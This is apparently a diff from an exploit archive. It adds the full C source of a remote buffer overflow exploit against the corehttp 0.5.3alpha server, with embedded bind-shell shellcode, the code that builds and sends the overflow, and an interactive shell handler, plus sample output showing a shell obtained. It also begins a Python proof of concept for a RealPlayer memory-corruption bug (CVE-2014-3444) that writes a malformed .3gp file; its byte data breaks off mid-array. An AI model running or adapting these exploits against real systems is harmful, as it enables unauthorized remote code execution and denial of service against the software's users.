+ *  return address contains a lowercase character it will uppercase it.    *
- *                                                                         *
+ *                                                                         *
- *  this exploit has 256(%4) bytes of working room, so avoiding lowercase  *
+ *  this exploit has 256(%4) bytes of working room, so avoiding lowercase  *
- *  characters should be doable.                                           *
+ *  characters should be doable.                                           *
- *                                                                         *
+ *                                                                         *
- *  note:                                                                  *
+ *  note:                                                                  *
- *   there are two areas in the stack this will appear, the one closer     *
+ *   there are two areas in the stack this will appear, the one closer     *
- *   to the top of the stack should be used.                               *
+ *   to the top of the stack should be used.                               *
- *                                                                         *
+ *                                                                         *
- *  example usage:                                                         *
+ *  example usage:                                                         *
- *   [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp                           *
+ *   [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp                           *
- *   [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555               *
+ *   [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555               *
- *   [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit.      *
+ *   [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit.      *
- *   [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)                  *
+ *   [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)                  *
- *                                                                         *
+ *                                                                         *
- *   [*] target                      : dual.fakehalo.lan:5555              *
+ *   [*] target                      : dual.fakehalo.lan:5555              *
- *   [*] return address              : 0xbfffea60                          *
+ *   [*] return address              : 0xbfffea60                          *
- *   [*] *sprocket replacement       : 0xbfffec60                          *
+ *   [*] *sprocket replacement       : 0xbfffec60                          *
- *                                                                         *
+ *                                                                         *
- *   [*] attempting to connect: dual.fakehalo.lan:5555.                    *
+ *   [*] attempting to connect: dual.fakehalo.lan:5555.                    *
- *   [*] successfully connected: dual.fakehalo.lan:5555.                   *
+ *   [*] successfully connected: dual.fakehalo.lan:5555.                   *
- *   [*] sending string:                                                   *
+ *   [*] sending string:                                                   *
- *   [+]  "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n"           *
+ *   [+]  "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n"           *
- *   [*] closing connection.                                               *
+ *   [*] closing connection.                                               *
- *                                                                         *
+ *                                                                         *
- *   [*] attempting to connect: dual.fakehalo.lan:7979.                    *
+ *   [*] attempting to connect: dual.fakehalo.lan:7979.                    *
- *   [*] successfully connected: dual.fakehalo.lan:7979.                   *
+ *   [*] successfully connected: dual.fakehalo.lan:7979.                   *
- *                                                                         *
+ *                                                                         *
- *   Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
+ *   Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
- *   uid=501(v9) gid=501(v9) groups=501(v9)                                *
+ *   uid=501(v9) gid=501(v9) groups=501(v9)                                *
- *                                                                         *
+ *                                                                         *
- * (...nothing like a overly complex exploit to quench my brain thirst.    *
+ * (...nothing like a overly complex exploit to quench my brain thirst.    *
- * although, i didn't do any support for randomized memory addresses, oh   *
+ * although, i didn't do any support for randomized memory addresses, oh   *
- * well)                                                                   *
+ * well)                                                                   *
- ***************************************************************************/
+ ***************************************************************************/
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#ifndef __USE_BSD
+#ifndef __USE_BSD
-#define __USE_BSD
+#define __USE_BSD
-#endif
+#endif
-#include <string.h>
+#include <string.h>
-#include <strings.h>
+#include <strings.h>
-#include <signal.h>
+#include <signal.h>
-#include <unistd.h>
+#include <unistd.h>
-#include <netdb.h>
+#include <netdb.h>
-#include <getopt.h>
+#include <getopt.h>
-#include <ctype.h>
+#include <ctype.h>
-#include <sys/socket.h>
+#include <sys/socket.h>
-#include <sys/types.h>
+#include <sys/types.h>
-#include <sys/time.h>
+#include <sys/time.h>
-#include <netinet/in.h>
+#include <netinet/in.h>
-#include <arpa/inet.h>
+#include <arpa/inet.h>
-
+
-#define BUFSIZE (2+512+16+256+4)
+#define BUFSIZE (2+512+16+256+4)
-#define TIMEOUT 10
+#define TIMEOUT 10
-#define SPORT 7979
+#define SPORT 7979
-
+
-#define DFL_RETADDR 0xbfffea60
+#define DFL_RETADDR 0xbfffea60
-
+
-/* globals. */
+/* globals. */
-
+
-/* linux_ia32_bind -  LPORT=7979 Size=243 Encoder=PexAlphaNum */
+/* linux_ia32_bind -  LPORT=7979 Size=243 Encoder=PexAlphaNum */
-/* http://metasploit.com */
+/* http://metasploit.com */
-/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
+/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
-static char x86_bind[]=
+static char x86_bind[]=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
-"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
+"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
-"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
+"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
-"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
+"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
-"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
+"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
-"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
+"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
-"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
+"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
-"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
+"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
-"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
+"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
-"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
+"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
-"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
+"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
-"\x42\x58\x5a";
+"\x42\x58\x5a";
-
+
-struct{
+struct{
- unsigned int addr;
+ unsigned int addr;
- char *host;
+ char *host;
- unsigned short port;
+ unsigned short port;
-}tbl;
+}tbl;
-
+
-/* lonely extern. */
+/* lonely extern. */
-extern char *optarg;
+extern char *optarg;
-
+
-/* functions. */
+/* functions. */
-char *getbuf(unsigned int);
+char *getbuf(unsigned int);
-unsigned short corehttp_connect(char *,unsigned short);
+unsigned short corehttp_connect(char *,unsigned short);
-signed int getshell_conn(char *,unsigned short);
+signed int getshell_conn(char *,unsigned short);
-void proc_shell(signed int);
+void proc_shell(signed int);
-void printe(char *,short);
+void printe(char *,short);
-void usage(char *);
+void usage(char *);
-void sig_alarm(){printe("alarm/timeout hit.",1);}
+void sig_alarm(){printe("alarm/timeout hit.",1);}
-
+
-/* start. */
+/* start. */
-int main(int argc,char **argv){
+int main(int argc,char **argv){
- signed int chr=0,rsock=0;
+ signed int chr=0,rsock=0;
-
+
- printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
+ printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
- "w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
+ "w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
- "\n\n");
+ "\n\n");
-
+
- tbl.addr=DFL_RETADDR;
+ tbl.addr=DFL_RETADDR;
-
+
- while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
+ while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
-  switch(chr){
+  switch(chr){
-   case 'h':
+   case 'h':
-    if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
+    if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
-     printe("main(): allocating memory failed",1);  
+     printe("main(): allocating memory failed",1);  
-    break;
+    break;
-   case 'p':
+   case 'p':
-    tbl.port=atoi(optarg);
+    tbl.port=atoi(optarg);
-    break;
+    break;
-   case 'r':
+   case 'r':
-    sscanf(optarg,"%x",&tbl.addr);
+    sscanf(optarg,"%x",&tbl.addr);
-    break;
+    break;
-   default:
+   default:
-    usage(argv[0]);
+    usage(argv[0]);
-    break;
+    break;
-  }
+  }
- }
+ }
- if(!tbl.host||!tbl.port)usage(argv[0]);
+ if(!tbl.host||!tbl.port)usage(argv[0]);
- if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
+ if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
- if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
+ if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
- ((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
+ ((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
- ((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
+ ((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
- ((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
+ ((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
-  printe("return address contains a lowercase character.",1);
+  printe("return address contains a lowercase character.",1);
-
+
- printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
+ printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
- printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
+ printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
- printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
+ printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
-
+
- corehttp_connect(tbl.host,tbl.port);
+ corehttp_connect(tbl.host,tbl.port);
- rsock=getshell_conn(tbl.host,SPORT);
+ rsock=getshell_conn(tbl.host,SPORT);
- if(rsock>0)proc_shell(rsock);
+ if(rsock>0)proc_shell(rsock);
- exit(0);
+ exit(0);
-}
+}
-
+
-/* make buf: */
+/* make buf: */
-/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
+/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
-char *getbuf(unsigned int addr){
+char *getbuf(unsigned int addr){
- unsigned int i=0;
+ unsigned int i=0;
- char *buf;
+ char *buf;
- if(!(buf=(char *)malloc(BUFSIZE+1)))
+ if(!(buf=(char *)malloc(BUFSIZE+1)))
-  printe("getbuf(): allocating memory failed.",1);
+  printe("getbuf(): allocating memory failed.",1);
- memset(buf,0,BUFSIZE);
+ memset(buf,0,BUFSIZE);
-
+
- /* needed to match the sscanf(); */
+ /* needed to match the sscanf(); */
- memcpy(buf,"X ",2);
+ memcpy(buf,"X ",2);
-
+
- /* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
+ /* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
- /* right up until the 'struct sprock_t *sprocket' pointer */
+ /* right up until the 'struct sprock_t *sprocket' pointer */
- memset(buf+2,'\x90',(513-sizeof(x86_bind)));
+ memset(buf+2,'\x90',(513-sizeof(x86_bind)));
- memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
+ memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
-
+
- /* replaces the *sprocket pointer, really only needed at 524[4], the */
+ /* replaces the *sprocket pointer, really only needed at 524[4], the */
- /* first ones are fillers. */
+ /* first ones are fillers. */
- for(i=0;i<16;i+=4){
+ for(i=0;i<16;i+=4){
-  *(long *)&buf[2+512+i]=(addr+512);
+  *(long *)&buf[2+512+i]=(addr+512);
- }
+ }
-
+
- /* the *sprocket pointer will now point to this, which goes to the */
+ /* the *sprocket pointer will now point to this, which goes to the */
- /* shellcode. */
+ /* shellcode. */
- for(i=0;i<256;i+=4){
+ for(i=0;i<256;i+=4){
-  *(long *)&buf[2+512+16+i]=addr;
+  *(long *)&buf[2+512+16+i]=addr;
- }
+ }
-
+
- /* needed to be interpreted by corehttp. */
+ /* needed to be interpreted by corehttp. */
- memcpy(buf+2+512+16+256,"\r\n\r\n",4);
+ memcpy(buf+2+512+16+256,"\r\n\r\n",4);
-
+
- /* send it on its way. */
+ /* send it on its way. */
- return(buf);
+ return(buf);
-}
+}
-
+
-/* connects to the vulnerable corehttp server. */
+/* connects to the vulnerable corehttp server. */
-unsigned short corehttp_connect(char *hostname,unsigned short port){
+unsigned short corehttp_connect(char *hostname,unsigned short port){
- signed int sock;
+ signed int sock;
- struct hostent *t;
+ struct hostent *t;
- struct sockaddr_in s;
+ struct sockaddr_in s;
- sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+ sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
- s.sin_family=AF_INET;
+ s.sin_family=AF_INET;
- s.sin_port=htons(port);
+ s.sin_port=htons(port);
- printf("[*] attempting to connect: %s:%d.\n",hostname,port);
+ printf("[*] attempting to connect: %s:%d.\n",hostname,port);
- if((s.sin_addr.s_addr=inet_addr(hostname))){
+ if((s.sin_addr.s_addr=inet_addr(hostname))){
-  if(!(t=gethostbyname(hostname)))
+  if(!(t=gethostbyname(hostname)))
-   printe("couldn't resolve hostname.",1);
+   printe("couldn't resolve hostname.",1);
-  memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
+  memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
- }
+ }
- signal(SIGALRM,sig_alarm);
+ signal(SIGALRM,sig_alarm);
- alarm(TIMEOUT);
+ alarm(TIMEOUT);
- if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
+ if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
-  printe("corehttp/httpd connection failed.",1);
+  printe("corehttp/httpd connection failed.",1);
- alarm(0);
+ alarm(0);
- printf("[*] successfully connected: %s:%d.\n",hostname,port);
+ printf("[*] successfully connected: %s:%d.\n",hostname,port);
- sleep(1);
+ sleep(1);
- printf("[*] sending string:\n");
+ printf("[*] sending string:\n");
- printf("[+]  \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
+ printf("[+]  \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
- "\\r\\n\"\n");
+ "\\r\\n\"\n");
- write(sock,getbuf(tbl.addr),BUFSIZE);
+ write(sock,getbuf(tbl.addr),BUFSIZE);
- sleep(1);
+ sleep(1);
- printf("[*] closing connection.\n\n");
+ printf("[*] closing connection.\n\n");
- close(sock);
+ close(sock);
- return(0);
+ return(0);
-}
+}
-
+
-/* connects to bindshell. */
+/* connects to bindshell. */
-signed int getshell_conn(char *hostname,unsigned short port){
+signed int getshell_conn(char *hostname,unsigned short port){
- signed int sock=0;
+ signed int sock=0;
- struct hostent *he;
+ struct hostent *he;
- struct sockaddr_in sa;
+ struct sockaddr_in sa;
- if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
+ if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
-  printe("getshell_conn(): socket() failed.",1);
+  printe("getshell_conn(): socket() failed.",1);
- sa.sin_family=AF_INET;
+ sa.sin_family=AF_INET;
- if((sa.sin_addr.s_addr=inet_addr(hostname))){
+ if((sa.sin_addr.s_addr=inet_addr(hostname))){
-  if(!(he=gethostbyname(hostname)))
+  if(!(he=gethostbyname(hostname)))
-   printe("getshell_conn(): couldn't resolve.",1);
+   printe("getshell_conn(): couldn't resolve.",1);
-  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
+  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
-  sizeof(sa.sin_addr));
+  sizeof(sa.sin_addr));
- }
+ }
- sa.sin_port=htons(port);
+ sa.sin_port=htons(port);
- signal(SIGALRM,sig_alarm);
+ signal(SIGALRM,sig_alarm);
- printf("[*] attempting to connect: %s:%d.\n",hostname,port);
+ printf("[*] attempting to connect: %s:%d.\n",hostname,port);
- alarm(TIMEOUT);
+ alarm(TIMEOUT);
- if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
+ if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
-  printf("[!] connection failed: %s:%d.\n",hostname,port);
+  printf("[!] connection failed: %s:%d.\n",hostname,port);
-  exit(1);
+  exit(1);
- }
+ }
- alarm(0);
+ alarm(0);
- printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
+ printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
- return(sock);
+ return(sock);
-}
+}
-
+
-/* process the bindshell. */
+/* process the bindshell. */
-void proc_shell(signed int sock){
+void proc_shell(signed int sock){
- signed int r=0;
+ signed int r=0;
- char buf[4096+1];
+ char buf[4096+1];
- fd_set fds;
+ fd_set fds;
- signal(SIGINT,SIG_IGN);
+ signal(SIGINT,SIG_IGN);
- write(sock,"uname -a;id\n",13);
+ write(sock,"uname -a;id\n",13);
- while(1){
+ while(1){
-  FD_ZERO(&fds);
+  FD_ZERO(&fds);
-  FD_SET(0,&fds);
+  FD_SET(0,&fds);
-  FD_SET(sock,&fds);
+  FD_SET(sock,&fds);
-  if(select(sock+1,&fds,0,0,0)<1)
+  if(select(sock+1,&fds,0,0,0)<1)
-   printe("getshell(): select() failed.",1);
+   printe("getshell(): select() failed.",1);
-  if(FD_ISSET(0,&fds)){
+  if(FD_ISSET(0,&fds)){
-   if((r=read(0,buf,4096))<1)
+   if((r=read(0,buf,4096))<1)
-    printe("getshell(): read() failed.",1);
+    printe("getshell(): read() failed.",1);
-   if(write(sock,buf,r)!=r)
+   if(write(sock,buf,r)!=r)
-    printe("getshell(): write() failed.",1);
+    printe("getshell(): write() failed.",1);
-  }
+  }
-  if(FD_ISSET(sock,&fds)){
+  if(FD_ISSET(sock,&fds)){
-   if((r=read(sock,buf,4096))<1)exit(0);
+   if((r=read(sock,buf,4096))<1)exit(0);
-   write(1,buf,r);
+   write(1,buf,r);
-  }
+  }
- }
+ }
- close(sock);
+ close(sock);
- return;
+ return;
-}
+}
-
+
-/* error! */
+/* error! */
-void printe(char *err,short e){
+void printe(char *err,short e){
- printf("[!] %s\n",err);
+ printf("[!] %s\n",err);
- if(e)exit(1);
+ if(e)exit(1);
- return;
+ return;
-}
+}
-
+
-/* usage. */
+/* usage. */
-void usage(char *progname){
+void usage(char *progname){
- printf("syntax: %s [-r] -h host -p port\n\n",progname);
+ printf("syntax: %s [-r] -h host -p port\n\n",progname);
- printf("  -h <host/ip>\ttarget hostname/ip.\n");
+ printf("  -h <host/ip>\ttarget hostname/ip.\n");
- printf("  -p <port>\ttarget port.\n");
+ printf("  -p <port>\ttarget port.\n");
- printf("  -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
+ printf("  -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
- exit(0);
+ exit(0);
-}
+}
-
+
-// milw0rm.com [2007-07-29]
+// milw0rm.com [2007-07-29]
--- a/platforms/multiple/dos/39182.py
+++ b/platforms/multiple/dos/39182.py
@ -0,0 +1,667 @@
 source: http://www.securityfocus.com/bid/67434/info
 RealPlayer is prone to a memory-corruption vulnerability.
 An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.
 Realplayer 16.0.3.51 is vulnerable; other versions may also be affected. 
 # Exploit Title: [Realplayer memory corruption in latest Version 16.0.3.51 ]
 # Date: [2014/05/13]
 # Exploit Author: [Aryan Bayaninejad]
 # Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
 # Vendor Homepage: [www.real.com]
 # Software Link: [
 http://www.filehippo.com/download_realplayer/download/9b931239de41b8dce664656f25e1c28b/
 ]
 # Version: [Version 16.0.3.51 and prior to that]
 # Tested on: [Windows Xp Sp 3 x86, Windows 7 Sp1 x86]
 # CVE : [CVE-2014-3444]
 details:
 Realplayer latest version 16.0.3.51 suffers from an  memory corruption
 Vulnerability via  a malformed .3gp file format when
 load RealPlayer\codecs\dmp4.dll .
 ####Note:it's Exploitable , But Not Stable.####
 Poc:
 #!/usr/bin/python
 data
 ="\x00\x00\x00\x18\x66\x74\x79\x70\x33\x67\x70\x36\x00\x00\x01\x00\x69\x73\x6F\x6D\x33\x67\x70\x36\x00\x00
 \x0F\x2D\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x02\x58
 \x00\x00\x19\xFA\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69
 \x6F\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4F\xFF\xFF\x28\x08\xFF\x00\x00\x05\xA4\x74\x72\x61\x6B\x00\x00\x00\x5C\x74
 \x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x19\xFA\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\xB0\x00\x00\x00\x90\x00\x00\x00\x00\x05
 \x40\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x0C\x00
 \x00\x00\x85\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x64\x65\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65
 \x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30\x31\x31\x00\x00\x00\x04\xCC\x6D\x69
 \x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6E\x66
 \x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00\x00\x00\x01\x00\x00
 \x04\x8C\x73\x74\x62\x6C\x00\x00\x00\xB8\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xA8\x6D\x70\x34\x76
 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB0\x00\x90\x00\x48
 \x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xFF\xFF\x00\x00\x00\x52\x65\x73\x64\x73\x00\x00\x00\x00
 \x03\x44\x00\x00\x00\x04\x3C\x20\x11\x00\x07\x61\x00\x01\x19\xE8\x00\x00\xCD\xE0\x05\x2D\x00\x00\x01\xB0\x08\x00\x00\x01
 \xB5\x89\x13\x00\x00\x01\x00\x00\x00\x01\x20\x00\xC4\x8D\x88\x00\x65\x05\x84\x12\x14\x63\x00\x00\x01\xB2\x4C\x61\x76\x63
 \x35\x32\x2E\x34\x31\x2E\x30\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x85
 \x00\x00\x00\x01\x00\x00\x00\x1C\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x3D\x00\x00
 \x00\x79\x00\x00\x01\x00\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01
 \x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00
 \x00\x06\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x01
 \x00\x00\x00\x09\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00
 \x00\x05\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0D\x00\x00\x00\x05\x00\x00\x00\x01
 \x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00
 \x00\x06\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x06\x00\x00\x00\x01
 \x00\x00\x00\x14\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x15\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x17\x00\x00
 \x00\x05\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x02\x28\x73\x74\x73\x7A\x00\x00\x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x85\x00\x00\x07\x61\x00\x00\x00\xB6\x00\x00\x01\x72\x00\x00\x01\x70\x00\x00\x01\xDC\x00\x00
 \x01\xFF\x00\x00\x02\x54\x00\x00\x02\x37\x00\x00\x02\x25\x00\x00\x02\x48\x00\x00\x02\x2C\x00\x00\x02\x3B\x00\x00\x02\x62
 \x00\x00\x02\x4E\x00\x00\x02\x81\x00\x00\x02\xD9\x00\x00\x03\x05\x00\x00\x02\x5F\x00\x00\x03\x8B\x00\x00\x02\xDD\x00\x00
 \x02\xB8\x00\x00\x02\xD7\x00\x00\x02\x90\x00\x00\x02\xA3\x00\x00\x02\x33\x00\x00\x02\x3E\x00\x00\x02\x2F\x00\x00\x02\x22
 \x00\x00\x02\x31\x00\x00\x02\x0C\x00\x00\x02\x76\x00\x00\x01\xF4\x00\x00\x02\x03\x00\x00\x02\x22\x00\x00\x04\x27\x00\x00
 \x02\x45\x00\x00\x02\x19\x00\x00\x02\x14\x00\x00\x03\x55\x00\x00\x02\x27\x00\x00\x01\xDF\x00\x00\x03\xDB\x00\x00\x02\x62
